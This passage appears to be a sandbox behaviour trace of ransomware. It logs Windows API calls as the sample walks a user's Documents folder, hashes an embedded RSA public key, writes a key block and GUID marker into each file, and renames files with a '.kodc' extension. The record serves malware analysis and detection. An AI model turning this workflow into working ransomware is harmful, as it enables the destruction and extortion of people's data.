RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d3c0 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaa8 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d408 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aac0 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaf0 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab08 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.621] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaf0 | out: hHeap=0x630000) returned 1 [0098.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab08 | out: hHeap=0x630000) returned 1 [0098.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ab08 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aaf0 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab08 | out: hHeap=0x630000) returned 1 [0098.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaf0 | out: hHeap=0x630000) returned 1 [0098.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.622] GetCurrentThreadId () returned 0x42c [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f2c8 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.622] GetCurrentThreadId () returned 0x42c [0098.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaf0 [0098.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab08 [0098.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.624] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14882, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.624] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.625] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.625] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.625] CloseHandle (hObject=0x5cc) returned 1 [0098.629] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qkllquzP-m.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qkllquzp-m.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qkllquzP-m.xlsx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qkllquzp-m.xlsx.kodc")) returned 1 [0098.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.629] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.631] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1086fd0, ftCreationTime.dwHighDateTime=0x1d5bc34, ftLastAccessTime.dwLowDateTime=0x59b26b0, ftLastAccessTime.dwHighDateTime=0x1d5c3a2, ftLastWriteTime.dwLowDateTime=0x59b26b0, ftLastWriteTime.dwHighDateTime=0x1d5c3a2, nFileSizeHigh=0x0, nFileSizeLow=0xd937, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rDdD54.doc", cAlternateFileName="")) returned 1 [0098.631] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rDdD54.doc") returned=".doc" [0098.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rDdD54.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rddd54.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.631] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=55607) returned 1 [0098.631] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.634] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd911, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.634] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.635] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.635] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xd937, lpOverlapped=0x0) returned 1 [0098.636] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.636] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.636] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.636] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.637] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.637] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.637] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.637] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.637] GetLastError () returned 0x0 [0098.637] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.637] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.637] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.637] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.637] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd940) returned 0x9ba4d90 [0098.637] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d408 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aac0 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d450 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aad8 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab08 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab20 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.638] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab08 | out: hHeap=0x630000) returned 1 [0098.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab20 | out: hHeap=0x630000) returned 1 [0098.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.639] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd937, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.639] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.639] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.639] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.639] CloseHandle (hObject=0x5cc) returned 1 [0098.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0098.640] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rDdD54.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rddd54.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rDdD54.doc.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rddd54.doc.kodc")) returned 1 [0098.641] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68c39880, ftCreationTime.dwHighDateTime=0x1d5bbc8, ftLastAccessTime.dwLowDateTime=0xa91ccab0, ftLastAccessTime.dwHighDateTime=0x1d5bcd5, ftLastWriteTime.dwLowDateTime=0xa91ccab0, ftLastWriteTime.dwHighDateTime=0x1d5bcd5, nFileSizeHigh=0x0, nFileSizeLow=0x4652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rL1VA_HOPLxyaV y9I.csv", cAlternateFileName="RL1VA_~1.CSV")) returned 1 [0098.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.642] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rL1VA_HOPLxyaV y9I.csv") returned=".csv" [0098.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rL1VA_HOPLxyaV y9I.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rl1va_hoplxyav y9i.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.642] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=18002) returned 1 [0098.642] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.644] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x462c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.644] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.645] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x4652, lpOverlapped=0x0) returned 1 [0098.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.646] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.646] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.647] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.647] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, 